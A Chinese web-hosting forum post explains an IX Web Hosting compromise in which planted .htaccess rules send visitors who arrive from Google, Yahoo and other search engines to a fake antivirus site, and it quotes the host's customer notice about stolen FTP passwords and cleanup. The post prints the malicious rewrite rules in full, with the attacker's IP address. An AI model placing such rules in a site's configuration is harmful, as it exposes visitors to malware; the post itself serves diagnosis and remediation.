【性价之王】	【线路之王】	【价格之王】	【配置之王】
【免费之王】	【香港首推】	【梯子之王】	【独服之王】

症状：
直接进入网站没有问题，从google等国外著名搜索引擎进入网站就会转向到一个病毒网站。
具体例子请看： http://bbs.idcspy.com/thread-36706-1-1.html

原因： 网站的.htaccess文件被修改，会加入如下代码：

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]

上面的代码就是判断访问者来源，如果是来自上面那些搜索引擎，就自动转向

解决方法： 修正.htaccess，并且去掉.htaccess的写入权限。同时修正根目录的权限，去掉写入权限。

来自IXwebhosting官方的信息，此安全隐患已经得到修正，他们也杀掉了服务器上大部分此类病毒，如果还有问题，请联系ixwebhosting检查。被感染的原因可能是由于你的ftp密码被盗，进而被修改网站文件。

下面是ixwebhosting关于此问题发给用户的信件：

In our ongoing commitment to the security of our customers, we have discovered a vulnerability located within many of our client’s websites, including yours. This is a self replicating virus which is found by visiting well-known search engines. When you click on any link it may redirect you to a fake Anti-Virus 2009 website which appears to scan your system and then asks you to download the software. Once downloaded and installed it begins displaying pop ups on your desktop. At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named “.htaccess” to your website. Any visitors to your website will then be redirected to the fake anti-virus website.

We have dedicated our systems administration team to finding a solution to this and are happy to say that as one of the first hosting companies we have successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected.

While your website is now secure, your computer may still be at risk. Here are two easy steps that will detect and remove this malicious software from your computer and make sure your website will not spread the virus again:

1. Uninstall the fake Anti-Virus software by following the instructions at this link:
http://www.bleepingcomputer.com/ … tall-antivirus-2009

2. Once removed, change your FTP password from within your web hosting control panel. Once logged in, click on the FTP Manager icon and then on the icon next to the password to change it.

To illustrate the severity of the issue I would like to share some facts with you:

* 26,991 of our customers have been infected with fake Anti-Virus 2009
* 79,469 websites have been spreading the Anti-Virus 2009 infection
* 120,923 malicious files have been removed from our system

We are constantly monitoring our servers for potential threats to your website, and are proud to say that we are among the first web hosts to identify this particular problem, and have been the first to offer a resolution. Your continued and safe presence on the internet is our top priority.

If you have questions regarding any of this information, please contact our support team anytime.

Kind Regards,

Fatima Said, CCO
IX Web Hosting

[贴子地址]:http://bbs.idcspy.com/thread-37171-1-1.html